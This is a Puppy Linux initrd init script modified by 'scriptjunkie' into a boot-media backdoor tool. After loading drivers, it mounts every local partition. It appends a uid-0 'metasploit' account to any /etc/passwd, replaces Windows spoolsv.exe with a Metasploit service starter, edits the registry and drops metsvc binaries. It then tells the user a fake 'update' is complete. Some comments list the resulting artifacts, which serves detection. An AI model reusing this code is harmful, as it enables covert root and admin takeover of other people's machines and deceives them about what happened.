#!/bin/sh
#(c) Copyright 2007 Barry Kauler, www.puppylinux.com
#2007 Lesser GPL licence v2 (http://www.fsf.org/licensing/licenses/lgpl.html)
#edited by scriptjunkie 2010
# Early setup for this initrd init script: blank the console, pin PATH to the
# initrd's own /bin and /sbin, and pick the layered-filesystem module name.
clear

PATH="/bin:/sbin"
KERNELVER="`uname -r`"

# layerfs / loglevel are read as lower-case variables; presumably they arrive
# from the kernel command line via init's environment -- TODO confirm.
[ $layerfs ] && LAYERFS=$layerfs
[ ! $LAYERFS ] && LAYERFS=aufs #aufs or unionfs
# Fall back to unionfs when modinfo prints nothing for aufs.
[ "`modinfo aufs 2>/dev/null`" = "" ] && LAYERFS=unionfs #precaution.

# LOGLEVEL is tested further down: when it is empty, stdout/stderr are sent to
# a log file instead of the console.
[ $loglevel ] && LOGLEVEL=$loglevel #v2.22


mntfunc() {
 # Mount one filesystem: mntfunc FSTYPE DEVICE MOUNTPOINT [OPTIONS]
 #  $1 filesystem type, ex: vfat
 #  $2 block device,    ex: /dev/sda1
 #  $3 mount point,     ex: /mnt/sda1
 #  $4 optional -o string, used only by the generic branch, ex: noatime
 # Globals written: MNT_T MNT_DEV MNT_DIR MNT_O ntfsRETVAL
 # Global read:     VFAT_OUT_PARAM (vfat branch; not assigned in this function)
 # Returns the status of the last mount attempt, or 14 when ntfs-3g exits
 # with 14, which this helper reports as a hibernated NTFS partition.
 # Expansions stay unquoted so word splitting matches the original helper.
 MNT_T="$1"
 MNT_DEV="$2"
 MNT_DIR="$3"
 MNT_O=""
 if [ $4 ]; then
  MNT_O="${4}"
 fi

 case "$MNT_T" in
  ntfs)
   # First attempt: plain read-write mount through the ntfs-3g driver.
   ntfs-3g $MNT_DEV $MNT_DIR -o umask=0,no_def_opts,noatime,rw 2>/dev/null #default is rw
   ntfsRETVAL=$?
   case $ntfsRETVAL in
    0)
     return 0
    ;;
    14)
     # Refuse the volume and print a red error on the console.
     echo -e "\\033[1;31m" >/dev/console #31=red
     echo -n "ERROR: Windows NTFS hibernated partition, cannot mount" > /dev/console
     echo -e "\\033[0;39m" >/dev/console
     return 14
    ;;
   esac
   # Any other failure: retry once with the 'force' option added.
   ntfs-3g $MNT_DEV $MNT_DIR -o umask=0,no_def_opts,noatime,rw,force 2>/dev/null
   return $?
  ;;
  vfat)
   mount -t $MNT_T -o $VFAT_OUT_PARAM $MNT_DEV $MNT_DIR
   return $?
  ;;
  *)
   # Generic case: pass -o only when the caller supplied options.
   if [ "$MNT_O" != "" ]; then
    mount -t $MNT_T -o $MNT_O $MNT_DEV $MNT_DIR
   else
    mount -t $MNT_T $MNT_DEV $MNT_DIR
   fi
   return $?
  ;;
 esac
}

umntfunc() {
 # Unmount helper. Callers must pass the mount point (a /mnt/... path),
 # not the device name.
 # Global written: LASTPARAM -- the argument(s) that start with /mnt/.
 # Returns the status of whichever unmount command ran.
 LASTPARAM="$(echo -n "$*" | tr '\t' ' ' | tr -s ' ' | tr ' ' '\n' | grep '^/mnt/')"
 # A mount-table line for that path mentioning ntfs or fuse means the volume
 # is released with fusermount; everything else goes through plain umount.
 if mount | grep "$LASTPARAM" | grep -E 'ntfs|fuse' >/dev/null; then
  fusermount -u $LASTPARAM
  return $?
 fi
 umount $@
 return $?
}

# Bring up the kernel pseudo-filesystems and make the initrd root writable so
# the rest of the script can create files under / and /tmp.
mount -t proc none /proc
mount -t sysfs none /sys
mount -t rootfs -o remount,rw rootfs /
ln -s /proc/mounts /etc/mtab #resize2fs,e2fsck need this.

#v3.95 for backwards naming compatibility...
# Without /proc/ide, map the old ide*/sata* PMEDIA names to their ata* forms.
if [ ! -e /proc/ide ];then #v3.97
 [ "$PMEDIA" = "ideflash" ] && PMEDIA="ataflash"
 [ "$PMEDIA" = "idezip" ] && PMEDIA="atazip"
 [ "$PMEDIA" = "idehd" ] && PMEDIA="atahd"
 [ "$PMEDIA" = "idecd" ] && PMEDIA="atacd"
 [ "$PMEDIA" = "satahd" ] && PMEDIA="atahd"
 [ "$PMEDIA" = "satacd" ] && PMEDIA="atacd"
fi

clear #got this out of embutils, compiled in t2 (as not currently in busybox)
# Unless LOGLEVEL is set, stdout and stderr of everything that follows go to
# /tmp/bootinit.log inside the initrd. From here on the person at the console
# only sees what is written explicitly to /dev/console.
[ ! "$LOGLEVEL" ] && exec 1>/tmp/bootinit.log 2>&1 #remove o/p from console. v2.22 loglevel added.

# NOTE(review): 'XXX-23' looks like a placeholder zone string; its purpose is
# not evident from this script.
export TZ='XXX-23'
/bin/hwclock -s -l #set system time (based on hw clock set to local time).

#does this initrd have all the zdrv components inside it?...
# Heuristic: more than 200 lines in modules.dep counts as 'yes'. ZDRVINIT is
# not read again in the visible part of the script.
ZDRVINIT='no'
[ `wc -l /lib/modules/$KERNELVER/modules.dep  | tr -s ' ' | cut -f 2 -d ' '` -gt 200 ] && ZDRVINIT='yes'

# RDSH=0 replaces this script with an interactive shell on the console,
# so nothing below runs in that case.
[ "$RDSH" = "0" ] && exec /bin/sh >/dev/console 2>&1 #w091222

###################LOAD MODULES TO ACCESS DRIVES#####################
 #STEP ONE
# Goal of this step: get storage controllers and buses loaded so that the
# machine's internal and removable drives show up as block devices.

#100214 one config of 2.6.33 has base floppy and ps/2 mouse support not builtin...
# modinfo printing anything means the module exists for this kernel.
[ "`modinfo floppy 2>/dev/null`" != "" ] && modprobe floppy
[ "`modinfo psmouse 2>/dev/null`" != "" ] && modprobe psmouse

#w462 if present, load it. enables recognition of drives attached to parallel port.
[ "`modinfo ppa 2>/dev/null`" != "" ] && modprobe ppa #also loads parport.ko

# Snapshot of the PCI device list; the greps below look for class codes in it.
ELSPCI="`elspci -l`" #jesses great little utility.
#v403 pcmcia drive support. i think this may need extra delay though...
if [ "`echo "$ELSPCI" | grep '060700'`" != "" ];then
 modprobe yenta_socket
 #...may have to add on a couple of seconds, need to test with a pcmcia drive.
 #v412 yeah, my pccard-usb adaptor needs delay before elspci recognises 0C0310 (ohci-hcd) interface...
 sleep 2
fi
#v423 k2.6.29.6 dmesg has warning that ehci-hcd should load before uhci-hcd and ohci-hid
# this is contrary to my understanding all these years, but oh well, let's do it...
[ "`echo "$ELSPCI" | grep '0C0320'`" != "" ] && modprobe ehci-hcd

# Load a driver for every PCI device by its modalias string; one dot is
# printed on the console per successful modprobe as a progress indicator.
MODALIASES="`cat /sys/bus/pci/devices/*/modalias`" #important, save to variable before loop.
for ONEMODALIAS in $MODALIASES
do
  modprobe -v $ONEMODALIAS #-v means verbose.
  [ $? -eq 0 ] && echo -n "." > /dev/console
done

#091222 some mmc/sd interfaces need this...
#(above code loop may have loaded sdhci/sdhci_pci or tifm_core/tifm_7xx1)
[ "`lsmod | grep '^sdhci'`" != "" ] && modprobe mmc_core && modprobe mmc_block
[ "`lsmod | grep '^tifm'`" != "" ] && modprobe mmc_core && modprobe mmc_block && modprobe tifm_sd

modprobe squashfs
# Legacy IDE stack only: /proc/ide exists when the old ide drivers are in use.
if [ -e /proc/ide ];then #v3.97
 modprobe cdrom
 modprobe ide-cd
fi
modprobe sr_mod > /dev/null 2>&1 #v3.93 now built-in to 2.6.25.x kernel.

# Record the sd* block devices seen so far, then start USB storage/HID support
# and load the filesystem and codepage modules needed for mounting.
#ATADRIVES="`cat /proc/partitions | grep "sd[a-z]$" | tr -s " " | cut -f 5 -d " " | tr "\n" " "`"
ATADRIVES="`ls -1 /sys/block | grep '^sd' | tr '\n' ' '`"

echo -n "$ATADRIVES" > /ATADRIVES #w479 for testing purposes if crash to console.

# Only when a USB host controller driver (uhci/ohci/ehci) is loaded.
if [ "`lsmod | grep -E '^uhci|^ohci|^ehci'`" != "" ];then
  modprobe usb-storage & #run as separate process
  WAITUSB="yes" # makes the wait loop further down run
  mount -t usbfs none /proc/bus/usb
  
  #v423 problem recent kernels: kernel configured to load hid-* extra drivers when
  #usbhid loads, but it doesn't work. Most unfortunate. Note, older kernels have the
  #hid-* (drivers for specific hardware, like Logitech wireless keyboard) builtin to
  #the usbhid driver. Now that they are separated out, it is a headache. Try this...
  # Capture uevents in the background; the log is parsed later for hid: modaliases
  # and the listener is killed via PIDHOT.
  /bin/hotplug2stdout_notimeout >/tmp/uevents.log &
  PIDHOT=$!
  modprobe usbhid #for a usb keyboard.
fi

#v3.95 driver now builtin to libata pata kernel...
if [ -e /proc/ide ];then #v3.97
 #ide zip or ide ls-120 drive?...
 [ ! "`dmesg | grep "ATAPI FLOPPY"`" = "" ] && modprobe ide-floppy
fi

#filesystems...
modprobe nls_cp437     #needed by windows filesystems.
modprobe nls_iso8859-1 #needed by linux filesystems.
#modprobe nls_utf8 #w007
#modprobe nls_cp850 #w468 now default for fat f.s. (2.6.29.2 kernel)
modprobe $LAYERFS #unionfs or aufs.
# fuse is what lets ntfs-3g in mntfunc mount NTFS volumes read-write.
modprobe fuse #for ntfs-3g driver.

# Wait for USB mass-storage devices to finish registering (only when the USB
# branch above set WAITUSB). Progress dots go to the console once per second.
if [ "$WAITUSB" = "yes" ];then #wait for device to register.
 #v3.94 Classmate laptop, needs more delay here... no, further down...
 sleep 1 #2 v403 bumped it up to 3. v412 try 1sec again.
 USBSTORAGES=0 ; CNTUSB=0
 while [ $USBSTORAGES -eq 0 ];do
  echo -n "." > /dev/console
  sleep 1
  CNTUSB=`expr $CNTUSB + 1`
  # Hard cap: give up after more than 25 passes.
  [ $CNTUSB -gt 25 ] && break
  #v412 bug, ubuntu kernel, got duplicate 'device found at 2', need 'sort -u'...
  USBSTORAGES=`/bin/dmesg | grep "usb-storage: device found at" | sort -u | wc -l | sed -e 's/ //g'`
  #if booting from usb, USBSTORAGES must be non-zero...
  [ "`echo "$PMEDIA" | grep 'usb'`" != "" ] && [ $USBSTORAGES -eq 0 ] && continue
  # Not booting from usb and nothing found: stop waiting.
  [ $USBSTORAGES -eq 0 ] && break
  # Keep looping until every device that was found also reports scan complete;
  # resetting USBSTORAGES to 0 re-enters the while condition.
  AVAILABLEUSBSTORAGES=`/bin/dmesg | grep "usb-storage: device scan complete" | wc -l | sed -e 's/ //g'`
  [ $USBSTORAGES -ne $AVAILABLEUSBSTORAGES ] && USBSTORAGES=0
 done
 [ $USBSTORAGES -ne 0 ] && sleep 1 #v412 was needed for classmate. was 2, try 1sec.
 
 #v423 load hid-* driver...
 # Modalias strings come from the uevent log captured by the background listener.
 for ONEHID in `grep -o 'MODALIAS=hid:[^ ]*' /tmp/uevents.log | cut -f 2 -d '=' | tr '\n' ' '`
 do
  modprobe $ONEHID
 done
 # Stop the background uevent listener started earlier.
 kill $PIDHOT
 
fi
#END STEP ONE
##############END MODULE LOADING TO ACCESS DRIVES####################

#######################FINDING PUPPY - no, windows FILES###########################
#locate all partitions (and superfloppy drives)...
# probepart_init output is reduced to "device|fstype" pairs with the /dev/
# prefix stripped (ex: sda1|ntfs), keeping only the listed filesystem types.
# Every partition on every detected drive is a candidate, not just one OS volume.
PCPARTSALL="`probepart_init -k`"
PCPARTS0="`echo "$PCPARTSALL" | grep '^/dev/' | cut -f 1-2 -d '|'  | grep -E 'iso9660|ext2|ext3|ext4|reiserfs|msdos|vfat|minix|ntfs' | sed -e 's/\/dev\///g'`" #v431
PCPARTS="`echo "$PCPARTS0" | tr "\n" " "`" #note, will have a space char on end.
LESSPARTS0="$PCPARTS0" #search everywhere.
# Space-separated form, iterated by the loop that follows.
LESSPARTS="`echo "$LESSPARTS0" | tr '\n' ' '`"

 #*********************************************************************
 #MODIFICATION BY SCRIPTJUNKIE
 #Everything below edits the machine's own disks while this initrd is
 #booted, so the installed OS is offline and its file permissions and
 #running security software are not in effect. It works only on volumes
 #that are readable and writable from foreign boot media; disk encryption
 #and firmware boot restrictions are the controls that address that.
 #
 #linux: append "metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh" to /etc/passwd.
 # adds new user metasploit with password metasploit and uid 0.
 #
 #windows: backs up spoolsv.exe as spoolsv.bak.exe and swaps it out for a
 # simple exe (/metsvcStarter.exe). Per the author's note, that exe starts
 # a script which installs metsvc, adds a new admin user with username and
 # password metasploit, and disables the firewall.
 # (The author's note named svchost.exe; the code below replaces spoolsv.exe
 # and only tests for SysWOW64/svchost.exe to choose the drop directory.)
 #
 #Artifacts left on an affected disk, all taken from the commands below:
 # - /etc/passwd: a "metasploit" line with uid 0 / gid 0 and a hash stored
 #   in passwd itself.
 # - system32: spoolsv.bak.exe beside a spoolsv.exe that is no longer the
 #   original file.
 # - system32, or SysWOW64 when SysWOW64/svchost.exe exists: metsvc.exe,
 #   metsrv.dll, metsvc-server.exe, autoinf.exe.
 # - system32/config: whatever /regeditor changes; not visible in this script.
 #*********************************************************************

for ONETRY in $LESSPARTS
do
 # Each entry is "device|fstype"; split it and mount the partition at /mnt/data.
 ONEDEV="`echo -n "$ONETRY" | cut -f 1 -d '|'`"
 ONEFS="`echo -n "$ONETRY" | cut -f 2 -d '|'`"
 mntfunc $ONEFS /dev/$ONEDEV /mnt/data 
 # Partitions that fail to mount (including hibernated NTFS, status 14) are skipped.
 if [ $? -ne 0 ];then
  continue
 fi
 # Linux branch: any partition with etc/passwd at its root gets the extra
 # uid-0 account line appended. A second uid-0 entry in passwd is the tell.
 [ -f /mnt/data/etc/passwd ] && echo metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh >> /mnt/data/etc/passwd
 cd /mnt/data
 # Windows branch: look for a Windows directory and its system32 under several
 # case spellings; if none exists, unmount and move to the next partition.
 cd WINNT || cd Winnt || cd winnt || cd WINDOWS || cd Windows || cd windows || { cd / && umntfunc /mnt/data && continue ; }
 cd system32 || cd System32 || cd SYSTEM32 || { cd / && umntfunc /mnt/data && continue ; }
 if [ -f spoolsv.exe ]; then
  # Keep a copy of the original binary, then put the initrd's
  # /metsvcStarter.exe in its place under the same name.
  cat spoolsv.exe > spoolsv.bak.exe
  rm -f spoolsv.exe
  cp -f /metsvcStarter.exe spoolsv.exe
  # /regeditor is run from system32/config, the directory Windows keeps its
  # registry hive files in; what it edits is not shown in this script.
  cd config || cd CONFIG || cd Config
  /regeditor >/dev/null
  cd ..
  # The support files go to SysWOW64 when SysWOW64/svchost.exe exists,
  # otherwise to system32.
  if [ -f ../SysWOW64/svchost.exe ]; then
   cd ../SysWOW64/
  fi
  cp -f /metsvc.exe .
  cp -f /metsrv.dll .
  cp -f /metsvc-server.exe .
  cp -f /autoinf.exe .
  # Console text presents the activity as an update; with stdout/stderr
  # redirected to the log earlier, this and the progress dots are all a
  # person at the machine sees.
  echo "The update process is complete. ">/dev/console
 fi
 cd /
 umntfunc /mnt/data
done
# Ask for a manual power cycle, then run the initrd's own /reboot.
echo "Please restart your computer with the power or reset button." > /dev/console
/reboot
